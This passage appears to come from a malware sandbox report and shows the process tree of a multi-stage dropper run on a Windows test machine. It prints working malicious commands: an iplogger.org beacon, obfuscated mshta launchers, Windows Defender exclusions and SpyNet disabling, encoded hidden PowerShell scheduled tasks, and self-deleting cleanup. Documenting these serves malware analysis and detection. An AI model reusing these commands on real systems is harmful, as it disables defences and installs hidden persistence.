        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
        7⤵
        
        PID:7456
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1876 /prefetch:1
        7⤵
        
        PID:6332
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
        7⤵
        
        PID:8256
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4676 /prefetch:8
        7⤵
        
        PID:5960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:8
        7⤵
        
        PID:5412
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:8
        7⤵
        
        PID:7464
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 /prefetch:8
        7⤵
        
        PID:6044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:8
        7⤵
        
        PID:8764
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 3432 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\hLRux0VFcRke45Fz8bd8YS8m.exe"
        6⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 3432
        7⤵
        Kills process with taskkill
        
        PID:8588
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 3432 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\hLRux0VFcRke45Fz8bd8YS8m.exe"
        6⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 3432
        7⤵
        Kills process with taskkill
        
        PID:8596
    - - C:\Users\Admin\Documents\6IFGlk_zgPccCvwWf2NC4b1f.exe
        
        "C:\Users\Admin\Documents\6IFGlk_zgPccCvwWf2NC4b1f.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:1420
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im 6IFGlk_zgPccCvwWf2NC4b1f.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\6IFGlk_zgPccCvwWf2NC4b1f.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 6IFGlk_zgPccCvwWf2NC4b1f.exe /f
        7⤵
        Kills process with taskkill
        
        PID:5224
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:7940
    - - C:\Users\Admin\Documents\LA0H97Jy7JTXyhAMB8p82pGx.exe
        
        "C:\Users\Admin\Documents\LA0H97Jy7JTXyhAMB8p82pGx.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4568
    - - C:\Users\Admin\Documents\GAWNGaeYF0NZ2GVZiHMjYV5x.exe
        
        "C:\Users\Admin\Documents\GAWNGaeYF0NZ2GVZiHMjYV5x.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2664
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c start "" "210921.exe" & start "" "269new.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"
        6⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\210921.exe
        
        "210921.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\269new.exe
        
        "269new.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"
        7⤵
        Blocklisted process makes network request
        
        PID:5852
    - - C:\Users\Admin\Documents\C4gm7bGmo81nDSphjWHCm13M.exe
        
        "C:\Users\Admin\Documents\C4gm7bGmo81nDSphjWHCm13M.exe"
        5⤵
        Executes dropped EXE
        
        PID:5068
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 656
        6⤵
        Program crash
        
        PID:4880
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 672
        6⤵
        Program crash
        
        PID:5948
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 684
        6⤵
        Program crash
        
        PID:6768
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 688
        6⤵
        Program crash
        
        PID:7124
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 852
        6⤵
        Program crash
        
        PID:1236
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 1092
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:4868
    - - C:\Users\Admin\Documents\o8y9myE_hSy5WMIZ1WbEsTSY.exe
        
        "C:\Users\Admin\Documents\o8y9myE_hSy5WMIZ1WbEsTSY.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2824
    - - C:\Users\Admin\Documents\_q3DSTYx4Xbm8ZXlvvREKKu3.exe
        
        "C:\Users\Admin\Documents\_q3DSTYx4Xbm8ZXlvvREKKu3.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3892
    - - C:\Users\Admin\Documents\jp0CXLB_GvSZC9M80QcltQld.exe
        
        "C:\Users\Admin\Documents\jp0CXLB_GvSZC9M80QcltQld.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4704
    - - C:\Users\Admin\Documents\9oJuiCJmKJYZ6vbvI3c0W9cq.exe
        
        "C:\Users\Admin\Documents\9oJuiCJmKJYZ6vbvI3c0W9cq.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:680
    - - C:\Users\Admin\Documents\j0_HYWP91xVVEO5qgAhADQMS.exe
        
        "C:\Users\Admin\Documents\j0_HYWP91xVVEO5qgAhADQMS.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2832
    - - C:\Users\Admin\Documents\ckjpJQVOpw2dVF39ozTwmjfV.exe
        
        "C:\Users\Admin\Documents\ckjpJQVOpw2dVF39ozTwmjfV.exe"
        5⤵
        Executes dropped EXE
        
        PID:2196
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5524
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5552
      - C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
        
        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
        6⤵
        
        PID:5208
        
        C:\Users\Admin\Documents\ImObj_oLhMutlz79sDoyZrW3.exe
        
        "C:\Users\Admin\Documents\ImObj_oLhMutlz79sDoyZrW3.exe"
        7⤵
        
        PID:8112
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\ImObj_oLhMutlz79sDoyZrW3.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\ImObj_oLhMutlz79sDoyZrW3.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
        8⤵
        Checks whether UAC is enabled
        
        PID:6424
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\ImObj_oLhMutlz79sDoyZrW3.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\ImObj_oLhMutlz79sDoyZrW3.exe" ) do taskkill -F -Im "%~nXU"
        9⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
        
        SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
        10⤵
        Checks whether UAC is enabled
        
        PID:4200
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
        11⤵
        Checks whether UAC is enabled
        
        PID:8380
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
        12⤵
        
        PID:8628
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
        11⤵
        Checks whether UAC is enabled
        Modifies Internet Explorer settings
        
        PID:9084
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
        12⤵
        
        PID:8916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
        13⤵
        
        PID:9040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
        13⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\control.exe
        
        control .\FUEj5.QM
        13⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
        14⤵
        
        PID:9128
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
        15⤵
        
        PID:9240
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
        16⤵
        Loads dropped DLL
        
        PID:9276
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -Im "ImObj_oLhMutlz79sDoyZrW3.exe"
        10⤵
        Kills process with taskkill
        
        PID:8636
        
        C:\Users\Admin\Documents\5i10lubrQRwvGRd00Ss2ufO_.exe
        
        "C:\Users\Admin\Documents\5i10lubrQRwvGRd00Ss2ufO_.exe" /mixtwo
        7⤵
        
        PID:6248
        
        C:\Users\Admin\Documents\oMm6NclZUAjLihTH3vfP5DoP.exe
        
        "C:\Users\Admin\Documents\oMm6NclZUAjLihTH3vfP5DoP.exe"
        7⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:6972
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:5136
        
        C:\Users\Admin\Documents\A7iYL87VDgxih4QOUtGxPAp6.exe
        
        "C:\Users\Admin\Documents\A7iYL87VDgxih4QOUtGxPAp6.exe"
        7⤵
        Suspicious use of SetThreadContext
        
        PID:8056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Executes dropped EXE
        
        PID:7960
        
        C:\Users\Admin\Documents\A7iYL87VDgxih4QOUtGxPAp6.exe
        
        "C:\Users\Admin\Documents\A7iYL87VDgxih4QOUtGxPAp6.exe"
        8⤵
        
        PID:8816
        
        C:\Users\Admin\Documents\pW7269HqOIKeQ7uR0fs0w0ry.exe
        
        "C:\Users\Admin\Documents\pW7269HqOIKeQ7uR0fs0w0ry.exe"
        7⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\7zSF276.tmp\Install.exe
        
        .\Install.exe
        8⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\7zSFEBA.tmp\Install.exe
        
        .\Install.exe /S /site_id "668658"
        9⤵
        Checks BIOS information in registry
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:5560
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        10⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        11⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:8276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:8984
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:9172
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        11⤵
        
        PID:8316
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:8556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:10084
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:7056
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        11⤵
        
        PID:6900
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:8184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:8636
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:8916
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        11⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:9972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:4332
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        10⤵
        
        PID:8664
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        11⤵
        
        PID:9044
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        12⤵
        
        PID:5132
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        12⤵
        
        PID:8608
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        10⤵
        
        PID:8688
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        11⤵
        
        PID:8964
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        12⤵
        
        PID:5684
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        12⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "ghInEawKg" /SC once /ST 13:30:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        10⤵
        Creates scheduled task(s)
        
        PID:6012
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "ghInEawKg"
        10⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "ghInEawKg"
        10⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 20:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\kIvrhCZ.exe\" uG /site_id 668658 /S" /V1 /F
        10⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:752
        
        C:\Users\Admin\Documents\KEz7xytxhegMqLUXSfXC1oW1.exe
        
        "C:\Users\Admin\Documents\KEz7xytxhegMqLUXSfXC1oW1.exe"
        7⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\tmp429_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp429_tmp.exe"
        8⤵
        Suspicious use of SetThreadContext
        
        PID:8392
        
        C:\Users\Admin\AppData\Local\Temp\tmp429_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmp429_tmp.exe
        9⤵
        
        PID:8924
        
        C:\Users\Admin\AppData\Local\Temp\tmp429_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmp429_tmp.exe
        9⤵
        
        PID:8732
        
        C:\Users\Admin\Documents\WmLIcJcctBYRVhjYV1RgHfuA.exe
        
        "C:\Users\Admin\Documents\WmLIcJcctBYRVhjYV1RgHfuA.exe"
        7⤵
        
        PID:4800
        
        C:\Users\Admin\Documents\QlodriO7fezK6ekPfE2k37BK.exe
        
        "C:\Users\Admin\Documents\QlodriO7fezK6ekPfE2k37BK.exe"
        7⤵
        
        PID:7176
        
        C:\Users\Admin\Documents\3f5TIKOtIcK83ksrod619ZHT.exe
        
        "C:\Users\Admin\Documents\3f5TIKOtIcK83ksrod619ZHT.exe" silent
        7⤵
        
        PID:8012
        
        C:\Users\Admin\Documents\qX_AmYxAJXSju4VLMA5djsoE.exe
        
        "C:\Users\Admin\Documents\qX_AmYxAJXSju4VLMA5djsoE.exe"
        7⤵
        
        PID:8872
        
        C:\Users\Admin\AppData\Local\Temp\is-DMTM0.tmp\qX_AmYxAJXSju4VLMA5djsoE.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DMTM0.tmp\qX_AmYxAJXSju4VLMA5djsoE.tmp" /SL5="$2052E,506127,422400,C:\Users\Admin\Documents\qX_AmYxAJXSju4VLMA5djsoE.exe"
        8⤵
        Loads dropped DLL
        Checks whether UAC is enabled
        
        PID:9020
        
        C:\Users\Admin\AppData\Local\Temp\is-HGF72.tmp\Sharefolder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HGF72.tmp\Sharefolder.exe" /S /UID=2709
        9⤵
        Drops file in Drivers directory
        Adds Run key to start application
        
        PID:8568
        
        C:\Program Files\Java\MXMLJRREBJ\foldershare.exe
        
        "C:\Program Files\Java\MXMLJRREBJ\foldershare.exe" /VERYSILENT
        10⤵
        Checks whether UAC is enabled
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:7060
        
        C:\Users\Admin\AppData\Local\Temp\12-dff52-5a6-2db9c-8b1c0e3fb46e1\Lahityrulo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\12-dff52-5a6-2db9c-8b1c0e3fb46e1\Lahityrulo.exe"
        10⤵
        Checks computer location settings
        
        PID:8580
        
        C:\Users\Admin\AppData\Local\Temp\23-91dc3-8fd-9af8b-a42eb36d3d75f\Jepaekynoha.exe
        
